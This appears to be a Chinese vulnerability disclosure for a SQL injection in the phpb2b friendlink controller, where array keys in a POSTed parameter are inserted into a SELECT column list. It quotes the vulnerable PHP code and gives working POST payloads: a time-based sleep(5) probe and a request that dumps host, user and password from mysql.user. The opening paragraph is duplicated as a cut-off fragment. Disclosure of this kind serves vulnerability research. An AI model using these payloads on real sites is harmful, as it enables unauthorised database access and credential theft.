### 简要描述: SQL注入#4 ### 详细说明: ``` 注入链接:/libraries/core/controllers/friendlink_controller.php 注入参数:friendlink 漏洞代码:(第18行开始) function add() { global $smarty; using( "message"); $pms = new Messages(); if (isset($_POST['do']) && !empty($_POST['friendlink'])) { pb_submit_check('friendlink'); $data = $_POST['friendlink']; $result = false; $data['status'] = 0; $data['created'] = $data['modified'] = $this->friendlink->timestamp; $result = $this->friendlink->save($data); if ($result) { $pms->SendToAdmin('', array( "title"=>$data['title'].L("apply_friendlink"), "content"=>$data['title'].L("apply_friendlink")."\n".$_POST['data']['email']."\n".$data['description'], )); flash('wait_apply'); } }else{ flash(); } }; $data = $_POST['friendlink'];从post中获取friendlink数组参数,并将$data 数组传入save函数,save函数中通过以下以下代码构造SQL语句:(libraries/core/model.php) $keys = array_keys($posts); $cols = implode($keys,","); $tbname = (is_null($tbname))? $this->getTable():trim($tbname); $this->table_name = $tbname; if(!empty($id)){...
### 简要描述: SQL注入#4 ### 详细说明: ``` 注入链接:/libraries/core/controllers/friendlink_controller.php 注入参数:friendlink 漏洞代码:(第18行开始) function add() { global $smarty; using( "message"); $pms = new Messages(); if (isset($_POST['do']) && !empty($_POST['friendlink'])) { pb_submit_check('friendlink'); $data = $_POST['friendlink']; $result = false; $data['status'] = 0; $data['created'] = $data['modified'] = $this->friendlink->timestamp; $result = $this->friendlink->save($data); if ($result) { $pms->SendToAdmin('', array( "title"=>$data['title'].L("apply_friendlink"), "content"=>$data['title'].L("apply_friendlink")."\n".$_POST['data']['email']."\n".$data['description'], )); flash('wait_apply'); } }else{ flash(); } }; $data = $_POST['friendlink'];从post中获取friendlink数组参数,并将$data 数组传入save函数,save函数中通过以下以下代码构造SQL语句:(libraries/core/model.php) $keys = array_keys($posts); $cols = implode($keys,","); $tbname = (is_null($tbname))? $this->getTable():trim($tbname); $this->table_name = $tbname; if(!empty($id)){ $sql = "SELECT $cols FROM ".$tbname." WHERE ".$this->primaryKey."='".$id."'"; 在save函数中$data 数组的键名会被拆分为select语句的列名列表$cols,由于$data 可控导致sql注入,且是数组键名,因此可绕过代码中的注入检测 ``` ### 漏洞证明: ``` 首先直接访问:http://127.0.0.1/phpb2b/index.php?do=friendlink&action=add查看网页源代码获取页面token <input type="hidden" name="formhash" value="7a8999986df50ec2" id="FormHash"> ``` [<img src="https://images.seebug.org/upload/201502/091347283946346da1b90c3ded1455d7ee1d8606.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/091347283946346da1b90c3ded1455d7ee1d8606.png) ``` 获取token后就可以进行SQL注入 http://127.0.0.1/phpb2b/index.php?do=friendlink&action=add Post: friendlink[if((length(user())>61),1,sleep(5))%23]=1&do=1&formhash=7a8999986df50ec2 ``` [<img src="https://images.seebug.org/upload/201502/0913471025b105352e43d4897ec68ff7af92b884.png" alt="2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/0913471025b105352e43d4897ec68ff7af92b884.png) ``` Mysql日志: ``` [<img src="https://images.seebug.org/upload/201502/09134701a457201a3d3eba4cce8e888ed326f664.png" alt="3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/09134701a457201a3d3eba4cce8e888ed326f664.png) ``` 成功执行延时注入 可无视SQL注入检测,执行任意SQL语句 http://127.0.0.1/phpb2b/index.php?do=friendlink&action=add Post: friendlink[host,user,password/**/from/**/mysql.user/**/where/**/1>0/**/limit/**/0,1%23]=1&do=1&formhash=7a8999986df50ec2 为了方便调试,代码里将sql语句打印出来 ``` [<img src="https://images.seebug.org/upload/201502/0913464327fcd890a999a70f481a553d9032cd1c.png" alt="4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/0913464327fcd890a999a70f481a553d9032cd1c.png) ``` Mysql日志: ``` [<img src="https://images.seebug.org/upload/201502/09134633b2e3360745fdfc3d588be508120c8010.png" alt="5.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201502/09134633b2e3360745fdfc3d588be508120c8010.png) ``` ```
